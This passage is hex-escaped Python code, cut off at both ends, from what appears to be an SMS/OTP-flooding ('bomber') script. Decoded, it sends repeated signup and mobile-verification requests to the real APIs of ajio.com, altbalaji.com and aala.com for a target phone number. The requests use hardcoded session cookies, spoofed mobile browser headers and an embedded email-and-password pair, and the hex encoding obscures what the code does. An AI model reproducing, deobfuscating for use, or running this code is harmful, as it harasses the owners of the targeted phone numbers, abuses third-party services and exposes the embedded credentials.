x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x39\x37\x39\x39\x32\x38\x33\x31\x39\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x36\x36\x36\x32\x37\x30\x32\x31\x36\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x56\x27\x3a\x20\x27\x32\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x36\x39\x31\x33\x2e\x31\x35\x32\x38\x33\x34\x39\x37\x32\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x74\x6f\x5f\x6c\x77\x69\x64\x27\x3a\x20\x27\x64\x39\x31\x62\x65\x61\x33\x61\x2d\x37\x36\x31\x30\x2d\x34\x35\x61\x61\x2d\x38\x66\x37\x38\x2d\x36\x35\x61\x30\x64\x37\x34\x30\x66\x62\x34\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x50\x75\x73\x68\x53\x75\x62\x73\x63\x72\x69\x62\x65\x72\x53\x74\x61\x74\x75\x73\x27\x3a\x20\x27\x44\x45\x4e\x49\x45\x44\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x70\x65\x63\x6c\x6f\x73\x65\x64\x27\x3a\x20\x27\x74\x72\x75\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x27\x3a\x20\x27\x67\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x53\x30\x31\x38\x63\x63\x35\x39\x33\x27\x3a\x20\x27\x30\x31\x65\x66\x36\x31\x61\x65\x64\x30\x66\x63\x61\x31\x31\x30\x66\x35\x30\x64\x38\x65\x33\x62\x65\x32\x63\x36\x36\x65\x62\x38\x33\x31\x38\x38\x66\x36\x64\x66\x38\x34\x39\x35\x63\x30\x65\x64\x32\x63\x64\x37\x37\x32\x38\x32\x39\x33\x37\x30\x66\x63\x31\x32\x36\x39\x30\x39\x35\x34\x61\x61\x64\x30\x38\x33\x34\x66\x35\x34\x35\x62\x35\x37\x37\x36\x34\x34\x36\x37\x64\x62\x62\x36\x36\x65\x66\x62\x30\x35\x64\x34\x38\x31\x61\x38\x39\x35\x38\x61\x65\x62\x62\x32\x37\x33\x37\x35\x31\x39\x35\x36\x65\x66\x39\x65\x62\x33\x38\x33\x61\x33\x62\x61\x32\x32\x64\x64\x31\x63\x39\x34\x64\x38\x32\x30\x32\x31\x65\x39\x64\x34\x63\x34\x30\x30\x31\x31\x64\x34\x61\x62\x39\x62\x64\x39\x37\x63\x36\x66\x30\x61\x37\x34\x36\x32\x38\x61\x63\x31\x32\x65\x38\x66\x37\x62\x63\x62\x36\x36\x33\x63\x31\x36\x30\x38\x65\x37\x32\x38\x38\x65\x62\x64\x32\x35\x32\x30\x35\x31\x63\x62\x38\x34\x64\x65\x66\x33\x62\x30\x32\x31\x64\x33\x62\x63\x66\x36\x34\x33\x64\x33\x66\x33\x37\x32\x38\x63\x61\x39\x63\x30\x64\x39\x63\x37\x38\x30\x64\x31\x37\x31\x35\x37\x38\x62\x61\x39\x36\x36\x37\x37\x34\x66\x31\x31\x61\x63\x34\x34\x38\x36\x34\x61\x37\x66\x33\x64\x61\x35\x39\x37\x39\x31\x63\x62\x35\x35\x66\x32\x37\x34\x31\x66\x32\x33\x64\x37\x32\x66\x37\x38\x34\x33\x65\x66\x65\x39\x33\x30\x36\x34\x35\x39\x63\x30\x30\x65\x63\x32\x65\x35\x66\x30\x30\x30\x36\x35\x37\x32\x39\x61\x38\x35\x37\x33\x62\x61\x62\x61\x34\x32\x33\x38\x34\x62\x62\x37\x63\x66\x34\x36\x65\x62\x35\x35\x63\x66\x38\x39\x66\x37\x32\x66\x31\x64\x63\x64\x35\x36\x31\x39\x61\x32\x36\x65\x34\x66\x66\x33\x32\x63\x36\x33\x64\x30\x36\x63\x61\x63\x38\x63\x34\x62\x62\x31\x35\x38\x64\x61\x36\x36\x34\x30\x62\x63\x30\x62\x31\x31\x31\x39\x33\x31\x33\x34\x63\x62\x66\x33\x38\x30\x35\x30\x61\x65\x30\x64\x62\x32\x33\x30\x61\x61\x32\x35\x38\x62\x31\x31\x38\x31\x37\x34\x39\x66\x62\x30\x33\x37\x33\x61\x66\x65\x30\x34\x31\x61\x64\x31\x61\x65\x66\x66\x64\x30\x63\x30\x38\x62\x65\x37\x61\x36\x32\x30\x31\x30\x64\x62\x30\x32\x63\x63\x36\x35\x65\x64\x66\x62\x31\x33\x34\x31\x64\x32\x64\x65\x35\x34\x63\x64\x66\x34\x37\x35\x63\x35\x64\x63\x64\x38\x34\x65\x31\x36\x63\x36\x34\x63\x35\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x63\x5f\x55\x41\x2d\x36\x38\x30\x30\x32\x30\x33\x30\x2d\x31\x27\x3a\x20\x27\x31\x2e\x31\x35\x36\x30\x33\x36\x36\x31\x39\x37\x2e\x43\x6a\x30\x4b\x43\x51\x6a\x77\x78\x59\x4c\x6f\x42\x52\x43\x78\x41\x52\x49\x73\x41\x45\x66\x31\x36\x2d\x74\x78\x35\x55\x58\x72\x72\x50\x39\x53\x45\x68\x52\x38\x64\x50\x6b\x54\x4c\x34\x61\x39\x77\x6f\x45\x46\x37\x41\x65\x2d\x6b\x76\x53\x6c\x7a\x4b\x64\x67\x71\x33\x35\x79\x33\x31\x44\x65\x4b\x33\x5f\x75\x68\x67\x38\x61\x41\x6b\x52\x42\x45\x41\x4c\x77\x5f\x77\x63\x42\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x64\x69\x67\x69\x4d\x72\x6b\x74\x27\x3a\x20\x27\x75\x74\x6d\x5f\x73\x6f\x75\x72\x63\x65\x25\x33\x41\x25\x37\x43\x75\x74\x6d\x5f\x6d\x65\x64\x69\x75\x6d\x25\x33\x41\x25\x37\x43\x64\x65\x76\x69\x63\x65\x25\x33\x41\x6d\x6f\x62\x69\x6c\x65\x25\x37\x43\x65\x78\x70\x69\x72\x65\x73\x25\x33\x41\x46\x72\x69\x25\x32\x43\x25\x32\x30\x31\x32\x25\x32\x30\x4a\x75\x6c\x25\x32\x30\x32\x30\x31\x39\x25\x32\x30\x31\x39\x25\x33\x41\x30\x33\x25\x33\x41\x31\x37\x25\x32\x30\x47\x4d\x54\x25\x37\x43\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x49\x6d\x70\x72\x65\x73\x73\x69\x6f\x6e\x43\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x69\x70\x27\x3a\x20\x27\x31\x30\x2e\x31\x2e\x31\x30\x2e\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x65\x73\x73\x69\x6f\x6e\x53\x74\x61\x74\x75\x73\x27\x3a\x20\x27\x74\x72\x75\x65\x7c\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x46\x69\x72\x73\x74\x50\x61\x67\x65\x27\x3a\x20\x27\x54\x68\x75\x20\x4a\x75\x6e\x20\x31\x33\x20\x32\x30\x31\x39\x20\x30\x30\x3a\x33\x33\x3a\x35\x33\x20\x47\x4d\x54\x2b\x30\x35\x33\x30\x20\x28\x49\x6e\x64\x69\x61\x20\x53\x74\x61\x6e\x64\x61\x72\x64\x20\x54\x69\x6d\x65\x29\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x64\x63\x5f\x67\x74\x6d\x5f\x55\x41\x2d\x36\x38\x30\x30\x32\x30\x33\x30\x2d\x31\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x49\x27\x3a\x20\x27\x6a\x6f\x68\x6e\x79\x61\x68\x6f\x25\x34\x30\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x53\x30\x31\x66\x65\x34\x32\x34\x39\x27\x3a\x20\x27\x30\x31\x65\x66\x36\x31\x61\x65\x64\x30\x39\x63\x33\x32\x63\x36\x61\x35\x33\x63\x65\x39\x65\x34\x33\x31\x61\x36\x61\x37\x31\x39\x63\x34\x31\x36\x38\x36\x37\x66\x32\x66\x33\x61\x64\x37\x31\x33\x66\x64\x65\x32\x65\x37\x34\x31\x37\x35\x62\x63\x32\x34\x38\x61\x63\x63\x37\x61\x35\x32\x33\x66\x34\x31\x65\x39\x37\x35\x31\x64\x30\x33\x32\x38\x35\x39\x61\x31\x35\x39\x62\x66\x66\x66\x38\x37\x36\x36\x34\x62\x39\x30\x63\x33\x64\x30\x61\x39\x64\x66\x62\x32\x33\x39\x32\x66\x37\x35\x38\x37\x36\x63\x63\x62\x65\x32\x37\x33\x62\x38\x61\x38\x65\x38\x31\x64\x37\x61\x38\x64\x32\x35\x30\x34\x37\x34\x35\x33\x63\x31\x37\x61\x32\x39\x30\x35\x65\x63\x61\x37\x65\x66\x66\x32\x36\x62\x37\x38\x30\x63\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x34\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x2f\x73\x69\x67\x6e\x75\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x66\x69\x72\x73\x74\x4e\x61\x6d\x65\x22\x3a\x22\x53\x70\x65\x65\x64\x58\x22\x2c\x22\x6c\x6f\x67\x69\x6e\x22\x3a\x22\x6a\x6f\x68\x6e\x79\x61\x68\x6f\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x22\x2c\x22\x70\x61\x73\x73\x77\x6f\x72\x64\x22\x3a\x22\x52\x6f\x63\x6b\x40\x35\x73\x74\x61\x72\x22\x2c\x22\x67\x65\x6e\x64\x65\x72\x54\x79\x70\x65\x22\x3a\x22\x4d\x61\x6c\x65\x22\x2c\x22\x6d\x6f\x62\x69\x6c\x65\x4e\x75\x6d\x62\x65\x72\x22\x3a\x22\x30\x30\x30\x30\x22\x2c\x22\x72\x65\x71\x75\x65\x73\x74\x54\x79\x70\x65\x22\x3a\x22\x53\x45\x4e\x44\x4f\x54\x50\x22\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x61\x75\x74\x68\x2f\x73\x69\x67\x6e\x75\x70\x53\x65\x6e\x64\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x5c\x22\x73\x74\x61\x74\x75\x73\x43\x6f\x64\x65\x5c\x22\x3a\x5c\x22\x31\x5c\x22\x22\x29\x20\x21\x3d\x20\x2d\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x34\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x61\x70\x69\x2e\x63\x6c\x6f\x75\x64\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x20\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6c\x69\x74\x65\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x38\x39\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x3b\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6c\x69\x74\x65\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x2f\x73\x75\x62\x73\x63\x72\x69\x62\x65\x3f\x70\x72\x6f\x67\x72\x65\x73\x73\x3d\x69\x6e\x70\x75\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x22\x3a\x63\x63\x2c\x22\x70\x68\x6f\x6e\x65\x5f\x6e\x75\x6d\x62\x65\x72\x22\x3a\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x63\x6c\x6f\x75\x64\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x76\x65\x72\x69\x66\x79\x3f\x64\x6f\x6d\x61\x69\x6e\x3d\x49\x4e\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x20\x3d\x3d\x20\x27\x32\x34\x66\x34\x36\x37\x62\x32\x34\x30\x38\x37\x66\x66\x34\x38\x63\x39\x36\x33\x32\x31\x37\x38\x36\x64\x38\x39\x63\x36\x39\x66\x27\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x35\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x66\x72\x6f\x6e\x74\x65\x6e\x64\x27\x3a\x20\x27\x61\x32\x37\x6d\x6e\x33\x68\x33\x69\x72\x74\x31\x72\x6c\x74\x36\x69\x35\x35\x73\x39\x33\x70\x39\x72\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x72\x6f\x6e\x74\x65\x6e\x64\x5f\x63\x69\x64\x27\x3a\x20\x27\x38\x7a\x71\x42\x42\x7a\x77\x51\x54\x4d\x49\x74\x39\x55\x4b\x67\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x42\x45\x41\x4d\x45\x52\x5f\x55\x53\x45\x52\x5f\x49\x44\x5f\x67\x41\x44\x72\x79\x63\x42\x6e\x31\x32\x38\x37\x30\x27\x3a\x20\x27\x63\x39\x66\x65\x34\x66\x37\x64\x2d\x62\x34\x32\x31\x2d\x34\x62\x61\x64\x2d\x39\x63\x66\x32\x2d\x30\x61\x34\x64\x62\x37\x31\x36\x64\x66\x66\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x27\x3a\x20\x27\x67\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x31\x30\x31\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x